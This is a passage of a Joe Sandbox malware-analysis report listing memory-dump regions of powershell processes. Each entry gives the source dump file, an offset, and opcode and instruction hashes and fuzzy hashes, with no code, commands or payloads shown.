                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63aba57ed949f9084b6f6fe2b98af61a93a4beac66bf5af2332d4f100f373278
                                        • Instruction ID: 4ef113455ab0cc240e23b74dbda578d713122f61398f4a3bbdfd291f2cbc20b3
                                        • Opcode Fuzzy Hash: 63aba57ed949f9084b6f6fe2b98af61a93a4beac66bf5af2332d4f100f373278
                                        • Instruction Fuzzy Hash: FE41E621D1DAC54FEB529B6944955B97FE0FF56250B0901FED04ECB2E3DA1D6C05C382
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92e36b01ab1b547733c0545cf549cf1af85a50252306d1b630a2eb2484ffd82b
                                        • Instruction ID: 5dd967d9afeed8e6a00a4db596d4eacd0772167236565024aea214479c61e0f5
                                        • Opcode Fuzzy Hash: 92e36b01ab1b547733c0545cf549cf1af85a50252306d1b630a2eb2484ffd82b
                                        • Instruction Fuzzy Hash: 7531D822D1EA860FE2A79B6C18555B8AAD1FF557A4F8801B9D00FC32D3ED0D7C04C642
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c55d15bf7e80754cc975b05e02954c0bacbbe65382024232ae805610c435d6f8
                                        • Instruction ID: 079179f46a2e6efaef87009337a522837d09502149abf2dc8f9b80b790778848
                                        • Opcode Fuzzy Hash: c55d15bf7e80754cc975b05e02954c0bacbbe65382024232ae805610c435d6f8
                                        • Instruction Fuzzy Hash: 6A210232E1DE4A4FE395962C94952F566C1FF916A1B8801B9D80EC33D3ED1EFC05C241
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bb8cc459561c7da288726024136b4c8358b1f5bcbb9f637177e07c7f181ebf8
                                        • Instruction ID: eb273f9d0865da97094dd3395a0c6e7b876e231101b72d5cf3c857886aeb0ecf
                                        • Opcode Fuzzy Hash: 4bb8cc459561c7da288726024136b4c8358b1f5bcbb9f637177e07c7f181ebf8
                                        • Instruction Fuzzy Hash: 5731DA3091864ECEFBB89F14CC2EBF93AA6FF55399F401539D40DC6192DA386D85CA11
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a50ca6b264bedd5e394326d7699835e57d8c40f1376071930d360be2a29a721b
                                        • Instruction ID: 0fea36fcd79e6eb997cbd03e0a13acaa71d1d74cfaaaaa56bf87f12b2b9a0055
                                        • Opcode Fuzzy Hash: a50ca6b264bedd5e394326d7699835e57d8c40f1376071930d360be2a29a721b
                                        • Instruction Fuzzy Hash: 0621F122E0EAC54FE355A6781C591746BE1FF966A0B0844BFC06EC72E3D81D6C0A8712
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6e3b314a0d924586b276bec96a5f9f03751d085b2ec340c4dce6bd5cbeab511
                                        • Instruction ID: 38da93c7431e2d8397d087029212358cd723f187123685b5bbbfeb046522559e
                                        • Opcode Fuzzy Hash: b6e3b314a0d924586b276bec96a5f9f03751d085b2ec340c4dce6bd5cbeab511
                                        • Instruction Fuzzy Hash: 1521C222D1D7854FF765AA6858562B8BBE1FF52760F1401FAD04E8B193DE2D2C448742
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                        • Instruction ID: a7a1c1831559c586f1a45e0046d5ce1e3a2923d4839b293a74852db65c5eeda5
                                        • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                        • Instruction Fuzzy Hash: D101A73011CB0C8FD744EF0CE451AA6B3E0FB95360F10052DE58AC3651D636E882CB42
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8727112642b7b4cd0bc179f0674cda90d2e5545868172a436d3178b940ccf4e4
                                        • Instruction ID: 8a67eae3ca372cfb474147a202801ea0664032cfa6e448feb89ea09e885c4d00
                                        • Opcode Fuzzy Hash: 8727112642b7b4cd0bc179f0674cda90d2e5545868172a436d3178b940ccf4e4
                                        • Instruction Fuzzy Hash: 36F02B33E1CD0C0EE395966C58152F5B3D2EFC8132B950277C10EC3146ED1AE81A4201
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: daa475b9de5a3cd382f0d394e716c22f708473e4ae38c080418320dd2b6675a7
                                        • Instruction ID: 91043574f89367a8b3606437e18461c0579ee6b01c0c920fd168d8b09c216fcf
                                        • Opcode Fuzzy Hash: daa475b9de5a3cd382f0d394e716c22f708473e4ae38c080418320dd2b6675a7
                                        • Instruction Fuzzy Hash: 05E04832F1DB090AFB59555C78121F9B392EF85174794147FD24FC2547EC1FA8168245
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73f2d4f8a3f7e66efb6849a8637b503f68b6b20d09d912be7f8582583bca9870
                                        • Instruction ID: 3ef1d7bfe02b63dab9c523b137be5bfabc1cd7a6a5dad5bb3f0c042477727685
                                        • Opcode Fuzzy Hash: 73f2d4f8a3f7e66efb6849a8637b503f68b6b20d09d912be7f8582583bca9870
                                        • Instruction Fuzzy Hash: 50817B34A21248DFCB15DBA4D884AADFBF2FF89314B5484B9E5059B361CB35E889CB50
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2a37135d692da820300b1e98c3527941361131d73e5ed0066f3d08c1e992690
                                        • Instruction ID: b7332df2fc712b052908d792e81131f87a937092817178d4f8ed69b913259cfd
                                        • Opcode Fuzzy Hash: d2a37135d692da820300b1e98c3527941361131d73e5ed0066f3d08c1e992690
                                        • Instruction Fuzzy Hash: 0C714C70A10209DFDB18DFA5D894BADFBF2BF88304F548469D412AB790DB75AD89CB40
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da74d3f2e4d94ad1dd075282d75cae01ceaa07912eca615d861badb69a3b0440
                                        • Instruction ID: e338b00296649dc7c8ca4cfa29b19656c442fdf183e8a8c6be0c7bac53f2f90f
                                        • Opcode Fuzzy Hash: da74d3f2e4d94ad1dd075282d75cae01ceaa07912eca615d861badb69a3b0440
                                        • Instruction Fuzzy Hash: AE717D71E20209DFDB10CFA9C981B9EFBF2AF88714F55803AD515A7254EB74A841CF91
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 216d58ff52334c413106f3923914dc4f6d6a5f798127a6b8049b295a0342e463
                                        • Instruction ID: 27bb9c3a50aa708e6ed31cce409a1ddedf4e891e0ade4b7c49d943cafec25f02
                                        • Opcode Fuzzy Hash: 216d58ff52334c413106f3923914dc4f6d6a5f798127a6b8049b295a0342e463
                                        • Instruction Fuzzy Hash: B4412735F003019FDBE48B68C650BAF77F69F84348B549466D505DB3A1E731D842C7A2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8de8838260a772337b8f8c99292849c1ba45f7184b667891f83c132f2037ff0c
                                        • Instruction ID: 31bc1e02e5b6adfa87dd4b1d6eab9d6dc99f99ccae4f0d22a1989ca83db325f1
                                        • Opcode Fuzzy Hash: 8de8838260a772337b8f8c99292849c1ba45f7184b667891f83c132f2037ff0c
                                        • Instruction Fuzzy Hash: 8F41EDB07203148FDB14DFA4CD99B6DBBB6BF89700B9040A5E502CB366DB34AC88CB51
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31a1c5120116579d5c50b1d7e20b523901afe7fe547afa33aac2b9b49af20cd1
                                        • Instruction ID: 34ced55c97c8170ab73b8d1817a12ad2e33455541120c664a24bca6132486e1f
                                        • Opcode Fuzzy Hash: 31a1c5120116579d5c50b1d7e20b523901afe7fe547afa33aac2b9b49af20cd1
                                        • Instruction Fuzzy Hash: 2B412D31E003019FDBA09F6CC94077A77B69FC4294B249476E9009B792E736DD87C7A1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 413b95a315f3dc478e622beffcce5508e9c7f7ddd593b5587733767297595565
                                        • Instruction ID: e136535b81a9eb2c49354ecad56ab910011dddeffabe5acef59e191f1e6132d8
                                        • Opcode Fuzzy Hash: 413b95a315f3dc478e622beffcce5508e9c7f7ddd593b5587733767297595565
                                        • Instruction Fuzzy Hash: E4417A71B102058FDB58EF64C858BADBBB6AF88750F444028E506EB7A0CF30AC80DB90
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eff992b96a42ad267e69f00d838577717d126c54434b0afd6791435ff1ca6d3
                                        • Instruction ID: e31e25829830cf4f3f32d6874e078330342071358778b4ebbae3fce5b51ff720
                                        • Opcode Fuzzy Hash: 5eff992b96a42ad267e69f00d838577717d126c54434b0afd6791435ff1ca6d3
                                        • Instruction Fuzzy Hash: 82412970A103199FDB18DFA5C89879DFBF6BF88344F548439D406AB790DB74A889CB80
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e4c65e91ac0a494315476159fa436509e2c04c53554dafacea714ff69167648
                                        • Instruction ID: dd1cf3d75f94e2b803db7900fb0dccf4f7580a34a60de8a5f0d536f15ae65406
                                        • Opcode Fuzzy Hash: 0e4c65e91ac0a494315476159fa436509e2c04c53554dafacea714ff69167648
                                        • Instruction Fuzzy Hash: BB218B327003059BEBA05EAA8810B7BB69A9FC4705F38C83AA506CB3C1DD75C942C3A5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70f63fa453c17706aee6b7529db2d8aba221033fc6382c293673f442ef227b3f
                                        • Instruction ID: 01d17b81c921e648963a48e37c452e46a700ce388186aa2acd4870832e4dd3c2
                                        • Opcode Fuzzy Hash: 70f63fa453c17706aee6b7529db2d8aba221033fc6382c293673f442ef227b3f
                                        • Instruction Fuzzy Hash: 6B219B32705340AFE7A00EB949607B66BA65FC1300F3C8466E545CB3C6D978CD42D375
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35937ace0d5177fa43c88c8fc9b97460d6b40e40f8081be72f98ded9a6fa719e
                                        • Instruction ID: 21726ca35539a2e51bbcea7cfa14980e557fb0dad6db5bf328d4870eebdd932e
                                        • Opcode Fuzzy Hash: 35937ace0d5177fa43c88c8fc9b97460d6b40e40f8081be72f98ded9a6fa719e
                                        • Instruction Fuzzy Hash: 0C21F3B17283868FEB15DF64CD99B6DBF71AF81704F8540A5D501CB262D738AC88CB91
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd1b7d797f155da4293539fd5daab41821a192a9acb0bcc764a7dfd63f5093d2
                                        • Instruction ID: 1688d61693ed1373c59cffa18e18d2ff6caf4d4d607227bf4fb790bd99577074
                                        • Opcode Fuzzy Hash: fd1b7d797f155da4293539fd5daab41821a192a9acb0bcc764a7dfd63f5093d2
                                        • Instruction Fuzzy Hash: 8E21A776A2D3D19FD7029B7C9CA07D9BF61CF43114F4A81E3C094CB193E41AA94AC7A6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01f052c0f68ce8a836997649f6fda886710cf3096103d4ce5154babcd9fbfc71
                                        • Instruction ID: 9eb7c57cf2b9ece8d779b62eecafcd37acb92483827685b18e96297b9e5de2b8
                                        • Opcode Fuzzy Hash: 01f052c0f68ce8a836997649f6fda886710cf3096103d4ce5154babcd9fbfc71
                                        • Instruction Fuzzy Hash: 9B312D30B1022C8BCB269B34C8556EEB7B6BF89345F0040E9D50AAB391DF359E85CF81
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ee5c7088c6cb14fea48e57656ecec18c5e6b326589586510984217124e9e79d
                                        • Instruction ID: 3cef314cc3c5712993ef7c07b67c651ce542232d7ae346bfcfbd9cacf2dfc270
                                        • Opcode Fuzzy Hash: 0ee5c7088c6cb14fea48e57656ecec18c5e6b326589586510984217124e9e79d
                                        • Instruction Fuzzy Hash: 2E212A75A00609DFCB04CF89D880AAAF7B5FF48310B158569E919EB751C731FC51CBA1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 891e203d017132e65a0a62f50ff11340f827df0baeb811a3b3143c1da37ae065
                                        • Instruction ID: 9b533f8c58ad961e4ad886d26a5de27c07bb942ed52bc28fbe653d37a7ca46d0
                                        • Opcode Fuzzy Hash: 891e203d017132e65a0a62f50ff11340f827df0baeb811a3b3143c1da37ae065
                                        • Instruction Fuzzy Hash: F121E475A0060ADFCB44CF89C880AAAF7B5FF88310B258569E909EB751C731FC51CBA0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 067506acda63b928f4029c8a208cdc1d85e79f65fc9517f58624340a016cf8aa
                                        • Instruction ID: 9699d49d81f278076bfaadd3db2fe3d833072335eaea38980587fe157af76cfa
                                        • Opcode Fuzzy Hash: 067506acda63b928f4029c8a208cdc1d85e79f65fc9517f58624340a016cf8aa
                                        • Instruction Fuzzy Hash: 7B110A34609384AFD7658B64C851F52BB31AF83318F14C49BE9458F292C7729C43CBD2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc7555d1d9856180bd46ac14e7a36e6e0dc12a93635ec72106729bc2c61ae492
                                        • Instruction ID: 2974d8dad1c653f3728a86add8d34b9141126206c4ee70388eb0addc79d5347b
                                        • Opcode Fuzzy Hash: cc7555d1d9856180bd46ac14e7a36e6e0dc12a93635ec72106729bc2c61ae492
                                        • Instruction Fuzzy Hash: 0401F7367003199BD7605DAAE4007BBBB9ADFC5226F18C43BD949CB241DA32D846CBA0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1807411543.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_95d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06497c90b4cdfb9e088f2d2d82fda61f4cf9e548d1f8bc83f6d988b5bb3279b4
                                        • Instruction ID: b5b5a5786ab7734d86690a3a031c4cbbf3650ac7c70351b60b615874897808f4
                                        • Opcode Fuzzy Hash: 06497c90b4cdfb9e088f2d2d82fda61f4cf9e548d1f8bc83f6d988b5bb3279b4
                                        • Instruction Fuzzy Hash: B601A2315063409BE720CA36DD84B66BB9CDF41366F18C45AED484A2C2C6799949CBB2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b2425d3092ed7d09b8b8ca843d1279f4c5f4aca4fd0a28609d28f65005795bd
                                        • Instruction ID: 6a94613372216712e4461286b07530f47d1dd3d1244bbb093fdc1f6d464afd69
                                        • Opcode Fuzzy Hash: 7b2425d3092ed7d09b8b8ca843d1279f4c5f4aca4fd0a28609d28f65005795bd
                                        • Instruction Fuzzy Hash: 22014478B102199FD700DB98D4917EDF771FF8E310B2481A9D95AA7361CA36EC038B50
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1807411543.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_95d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc1cd800e941bc3ee09bead68fa2a298d06b00bf7d3b08cf9732634dcb2898a2
                                        • Instruction ID: bf964cd2293c296a122eb04f65f36c188fe7430fe47a16f56757c6f434d32f19
                                        • Opcode Fuzzy Hash: fc1cd800e941bc3ee09bead68fa2a298d06b00bf7d3b08cf9732634dcb2898a2
                                        • Instruction Fuzzy Hash: C8014C6200E3C05FE7128B218D94B52BFA8AF53225F18C1DBDC888F2D3C2699849C772
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1f957d9ff91c2e4db95e1ded0116c059871f7908c5d381fe05ee5d1c69b24f3
                                        • Instruction ID: 9c315326031d92bc323d1d4d5ca11cb4024066cd3314b440795869f354d4ba09
                                        • Opcode Fuzzy Hash: d1f957d9ff91c2e4db95e1ded0116c059871f7908c5d381fe05ee5d1c69b24f3
                                        • Instruction Fuzzy Hash: 82F0BE74A10105DFCB00DF98C8407AAF775FF88211B2084A9CA4AA3651CB36EC63CB91
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ddf17ca723492f262565140e96639b49e94099ce9027f6dff3ae62eb407526ac
                                        • Instruction ID: 2b79d3e4dc19781b3c876d6e0ab30c9c4be95383c974b7a2db3e20fa3a2a62a0
                                        • Opcode Fuzzy Hash: ddf17ca723492f262565140e96639b49e94099ce9027f6dff3ae62eb407526ac
                                        • Instruction Fuzzy Hash: 1FF0153460D3809FD3928B14D854A20FB71AB83258B18E0DBC0848F2A3D7678843CB52
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1807411543.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_95d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04c527dba2225112cc4ba3b8aef379d62eb448d66131f34fcbfec32705f8ee71
                                        • Instruction ID: 4ecf5670b9c820271fb1627179cfae648f10a10a3a7493d6f0192a88460ec5e6
                                        • Opcode Fuzzy Hash: 04c527dba2225112cc4ba3b8aef379d62eb448d66131f34fcbfec32705f8ee71
                                        • Instruction Fuzzy Hash: 57213AB2505344DFDB25DF10D9C0F16BB65FB9C315F248569DC094B246C336D85ACBA2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ~l$~l$~l$~l
                                        • API String ID: 0-2327373241
                                        • Opcode ID: 59de224ebe7ac2534d8e3b7b921d62a147d12e65606b96d71240240325a5ab92
                                        • Instruction ID: e112fe56ccffb4375b241792584a127d3136d450e2b00caf0d5627d7ef1272d5
                                        • Opcode Fuzzy Hash: 59de224ebe7ac2534d8e3b7b921d62a147d12e65606b96d71240240325a5ab92
                                        • Instruction Fuzzy Hash: 02F13732B003158FDBA09B699D007AAB7E6AFC5224F14847AD546CB292DB72CD46C7E1